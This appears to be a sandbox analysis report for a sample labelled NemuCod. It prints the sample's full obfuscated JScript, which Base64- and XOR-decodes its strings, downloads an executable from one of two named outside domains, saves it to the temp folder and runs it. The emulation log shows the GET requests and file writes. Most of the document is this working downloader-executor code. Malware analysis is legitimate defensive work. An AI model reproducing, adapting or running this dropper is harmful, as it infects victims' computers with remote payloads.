Title NemuCod
MD5 8f4e417afdb10c9d3d4b703c22009a60 (4544 bytes)
Submitted 2021-04-20 15:26:07
Started None
Completed 2021-04-20 15:26:18
var decode = function (packedText) {
    var cipher ="NYTSNPfMN9Kk7sBU";

    var Base64 = {
        _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

        decode: function (input) {
            var output = "";
            var chr1, chr2, chr3;
            var enc1, enc2, enc3, enc4;
            var i = 0;

            input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

            while (i < input.length) {

                enc1 = this._keyStr.indexOf(input.charAt(i++));
                enc2 = this._keyStr.indexOf(input.charAt(i++));
                enc3 = this._keyStr.indexOf(input.charAt(i++));
                enc4 = this._keyStr.indexOf(input.charAt(i++));

                chr1 = (enc1 << 2) | (enc2 >> 4);
                chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
                chr3 = ((enc3 & 3) << 6) | enc4;

                output = output + String.fromCharCode(chr1);

                if (enc3 != 64) {
                    output = output + String.fromCharCode(chr2);
                }
                if (enc4 != 64) {
                    output = output + String.fromCharCode(chr3);
                }

            }

            output = Base64._utf8_decode(output);

            return output;

        },
        _utf8_decode: function (utftext) {
            var string = "";
            var i = 0;
            var c = c1 = c2 = 0;

            while (i < utftext.length) {

                c = utftext.charCodeAt(i);

                if (c < 128) {
                    string += String.fromCharCode(c);
                    i++;
                }
                else if ((c > 191) && (c < 224)) {
                    c2 = utftext.charCodeAt(i + 1);
                    string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
                    i += 2;
                }
                else {
                    c2 = utftext.charCodeAt(i + 1);
                    c3 = utftext.charCodeAt(i + 2);
                    string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
                    i += 3;
                }

            }
            return string;
        }
    };

    var text = Base64.decode(packedText);

    var cipherLength = cipher.length;
    var result = "";
    for (var i = 0; i < text.length; i++) {
        result += String.fromCharCode(text.charCodeAt(i) ^ cipher.charCodeAt(i % cipherLength));
    }
    return result;
};
(function() {
    var refectoryVSk = 200;
    var smatteringxHT = decode('"CRwA"');
    var machinationjUB = decode('"CyExMA=="');
    var piquevXi = decode('"GQo3IScgEmMdUS4HWw=="');
    var proprietyAcA = decode('"AwoMHgJiSBUDdQM/YyM="');
    var canonRAY = decode('"Dx0bFww="');
    var ominousLgO = decode('"HS0mNi89"');
    var encroachmentHPT = decode('"aw0RHh51Og=="');
    var consecrateVOe = decode('"YDwsNg=="');
    var purportGtS = 2e5;
    var propitiateWPS = [ decode('"Ji0gI3R/SSUrVScEQBwwOSooJSJgMwkgYQp/RVILJw=="'), decode('"Ji0gI3R/STo6XyIYUBwrOykxMSErNgBjLVYmRARHbDA2PA=="') ];
    var exegesispv5 = 524288;
    var jetb0x = WScript.CreateObject(piquevXi);
    var repineEaK = WScript.CreateObject(proprietyAcA);
    var arbitratedQk = WScript.CreateObject(canonRAY + decode('"YA=="') + ominousLgO);
    var specioushfk = jetb0x.ExpandEnvironmentStrings(encroachmentHPT);
    var caucusDtL = specioushfk + exegesispv5 + consecrateVOe;
    var connotationXul = false;
    for (var sinuouss6G = 0; sinuouss6G < propitiateWPS.length; sinuouss6G++) {
        try {
            var courtdRd = propitiateWPS[sinuouss6G];
            repineEaK.open(smatteringxHT, courtdRd, false);
            repineEaK.send();
            if (repineEaK.status == refectoryVSk) {
                try {
                    arbitratedQk.open();
                    arbitratedQk.type = 1;
                    arbitratedQk.write(repineEaK.responseBody);
                    if (arbitratedQk.size > purportGtS) {
                        sinuouss6G = propitiateWPS.length;
                        arbitratedQk.position = 0;
                        arbitratedQk.saveToFile(caucusDtL, 2);
                        connotationXul = true;
                    }
                } finally {
                    arbitratedQk.close();
                }
            }
        } catch (ignored) {}
    }
    if (connotationXul) {
        jetb0x[machinationjUB](specioushfk + Math.pow(2, 19));
    }
})();
[CREATE] WScript.Shell
[CREATE] MSXML2.XMLHTTP
[CREATE] ADODB.Stream
[NET] GET http://helloworldqqq.com/34.exe
[WRITE] {Data received from http://helloworldqqq.com/34.exe}
[NET] GET http://wtfisgoinghereff.com/34.exe
[WRITE] {Data received from http://wtfisgoinghereff.com/34.exe}